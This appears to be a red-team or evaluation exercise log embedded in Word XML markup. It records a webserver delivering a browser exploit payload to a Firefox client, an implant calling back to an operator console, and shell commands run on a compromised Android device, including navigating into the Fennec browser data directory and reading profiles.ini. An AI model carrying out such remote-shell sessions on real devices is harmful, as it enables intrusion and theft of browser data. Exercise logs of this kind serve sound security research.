    <w:p w14:paraId="7AF6C4C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Firefox www.nintendo.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6FE12" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23ADF05A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA712E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cs# ./run_webserver.sh                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704CC4C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Building index.html using magic and polystub.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E7099" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Serving HTTP on 0.0.0.0 port 8114 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D29A7D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [17/May/2019 11:50:38] "GET / HTTP/1.1" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D7F75" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8F815F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=AA64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62F97E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [17/May/2019 11:50:38] "GET /index.html?q=AA64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A4AC2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:A ARCH:A64 looking up "AA64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2FB92" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9FD0F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>writing 0x6C6A8 (444072) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE0D4E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E12F8C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E9C8E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD24DC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 5167s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0BB55B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 3827s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B394F0F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AB49D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0FAD6C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067CDF88" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [android] [arm32] [#1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019] [4.4.88-gb4310317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9808F8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new android console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D0483" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [A1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2D727" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC4CA88" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619ABBAA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        active 14s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E570E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 5186s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE75F4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 3846s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFB827" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374897F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9E857" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con A1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53521B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381C36E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343322E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF1738" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 10067 u0_a67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA7944" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCAE8D7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2253505B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E7B23" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0506E3E1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460F372" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46684BE8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34E7E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB1AD4F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D529D79" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056FE268" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D7325" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd /data/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2647113C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd org.mozilla.fennec_vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6CE685" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD426E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cd mozilla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E43FCE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1770B946" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A807A6F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;cat profiles.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5E385" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47562E12" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[Profile0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503250B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Name=default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E5C36" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A344927" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IsRelative=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E72639" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Path=xdd9quhn.default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B2365E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DC8FEF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738AB137" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[General]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD92AD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>StartWithLastProfile=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0CEE3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFDC4B7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647069AF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47934A2C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78914D87" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        active 414s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958222F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 5586s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452465E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 4246s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20652582" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635CAB9D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7530997F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D99D1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4182CA5B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5199E052" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        active 414s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F8CC6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 5586s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C083961" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 4246s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E39F1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551CE90" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        active 13136s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E0F07" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 18308s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F435988" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 16968s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE9603" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con A1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DE89A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB12AEB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 10067 u0_a67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C86472" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2328B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2019E321" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>A1&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B1A4B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C76A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        DEAD 13145s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980C27A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        DEAD 18324s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2BB64" w14:textId="596D9051" w:rsidR="005A0BE6" w:rsidRPr="00650FDF" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 1</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t>0:47:39 2019        DEAD 16998s</w:t>
      </w:r>
    </w:p>
